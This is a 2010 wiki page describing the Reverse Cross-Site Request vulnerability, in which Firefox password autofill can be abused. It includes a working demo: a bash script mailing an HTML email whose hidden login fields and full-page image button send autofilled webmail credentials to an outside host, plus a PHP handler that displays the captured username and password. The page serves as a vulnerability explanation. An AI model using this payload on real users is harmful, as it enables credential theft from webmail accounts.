Difference between revisions of "Reverse Cross-Site Request (RCSR) vulnerability"

From YobiWiki
m (Reverted edits by Etegohy (Talk) to last revision by PhilippeTeuwen)

Latest revision as of 21:37, 24 November 2010

Intro

This is a new class of vulnerabilities discovered by Robert Chapin.
A resolution for Firefox is under discussion.
It is incredibly easy to set up an attack, and the exposure is much larger than just blogs and forums.

Example

We'll carry out the attack by forging an email that is read in a webmail client, here squirrelmail.

Conditions

  • Use Firefox
  • Let Firefox remember the password for your squirrelmail website
  • Have only one login remembered for that site; otherwise Firefox does not autocomplete the login form but waits for you to start filling it in
  • Ask squirrelmail to display the HTML version by default (in your prefs)

Forge email

Warning! In this example the destination form is on my own website, so if you try it as such it means that I will receive your account info!
You can e.g. temporarily change your password just for the demo.
If you use my form, note that you will be prompted about my SSL certificate; this is because it is a self-signed (self-generated) certificate. I could have done it without SSL, but then your account info would have flown in clear text over the Net!

#!/bin/bash
TO=your@email.com
mail -s test-sec \
   -a "MIME-Version: 1.0" \
   -a "Content-Type: text/html; charset=ISO-8859-1" \
   -a "Content-Transfer-Encoding: 7bit" \
   $TO << EOF
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">
<title></title>
</head>
<body bgcolor="#ffffff" text="#000000">
TEST<br>Click on the image.
<form action="https://www.yobi.be/form.php" method="post" target="_blank">
<input type="text" name="login_username" style="display: none;" />
<input type="password" name="secretkey" style="display: none;" />
<input type="hidden" name="js_autodetect_results" value="0" />
<input type="hidden" name="just_logged_in" value="1" />
<input type="image" value="Login" src="https://www.yobi.be/1" style="width: 640px; height: 480px;
border: 1px; position: absolute; top: 0px; left: 0px; display: block;"/>
</form>
</body>
</html>
EOF

On attacker's site

On my site, the form handler is as simple as this, just to show you that I got your data:

<?php
echo "Your login: ".$_POST['login_username'];
echo "<br>Your password: ".$_POST['secretkey'];
echo "<br>Your site: ".$_SERVER['HTTP_REFERER'];
?>